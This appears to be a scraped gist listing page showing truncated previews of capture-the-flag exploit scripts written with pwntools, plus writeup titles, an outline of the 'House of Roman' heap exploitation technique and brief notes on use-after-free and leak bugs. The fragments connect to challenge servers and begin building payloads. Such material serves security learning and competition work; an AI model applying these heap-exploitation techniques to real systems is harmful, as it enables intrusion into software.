Challenge makes a thread to do the job. So , a thread_arena is created on a new mmap_segment.
Overflow in read function :
for ( i = 0LL; ; i += v3 )
{
romanking98
romanking98
/ exploit_secure.py
Created
December 11, 2017 08:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| p = remote("secure_keymanager.pwn.seccon.jp",47225) | |
| #p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"}) | |
| raw_input() | |
| def menu(): | |
| p.recvuntil(">>") |
romanking98
/ exploit_left.py
Created
December 17, 2017 16:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| rol1 = lambda val, r_bits, max_bits: \ | |
| (val << r_bits%max_bits) & (2**max_bits-1) | \ | |
| ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits))) | |
| ror1 = lambda val, r_bits, max_bits: \ | |
| ((val & (2**max_bits-1)) >> r_bits%max_bits) | \ | |
| (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1)) |
romanking98
/ exploit_memo.py
Created
December 17, 2017 16:10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| elf = ELF("./libc-2.23.so") | |
| p = remote("159.203.116.12", 8888) | |
| #p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"}) | |
| raw_input() | |
| def menu(): | |
| p.recvuntil(">") |
romanking98
/ exploit_readme.py
Last active
January 16, 2018 08:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| p = remote("35.198.130.245", 1337) | |
| #p = process("./readme_revenge") | |
| raw_input() | |
| #name = "A"*920 | |
| name = p64(0x00) # Pass NULL Check. | |
| name += "XXXX" |
romanking98
/ exploit_sapeloshop.py
Created
January 22, 2018 13:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| elf = ELF("./libc-2.23.so") | |
| #r = remote("http://sapeloshop.teaser.insomnihack.ch",80) | |
| r = remote('sapeloshop.teaser.insomnihack.ch', 80) | |
| #r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"}) | |
| raw_input() | |
| i = int("3d714", 16) |
romanking98
/ null_writeup.md
Last active
April 18, 2018 13:57
romanking98
/ gogogadget_writeup.md
Created
March 24, 2018 15:18
romanking98
/ House_of_Roman.md
Last active
July 22, 2024 12:13
- Disclamair
- House Of Roman
------> 2.1 Assumptions
------> 2.2 Protections
------> 2.3 Quick Walkthrough
------> 2.4 Setting the FD to malloc_hook
------> 2.5 Fixing the 0x71 freelist
------> 2.6 Unsorted Bin attack on malloc_hook
Challenge from RCTF, prequals to XCTF.
There are 2 bugs in the program : the first is an obvious UAF. The second is no NULL termination immediately after our input, allowing us to leak. NULL byte terminates at buf + size - 1, read loop breaks if buf == "\n"
However, leaking is tricky since program uses calloc, which sets the newly allocated heap chunk to 0x00.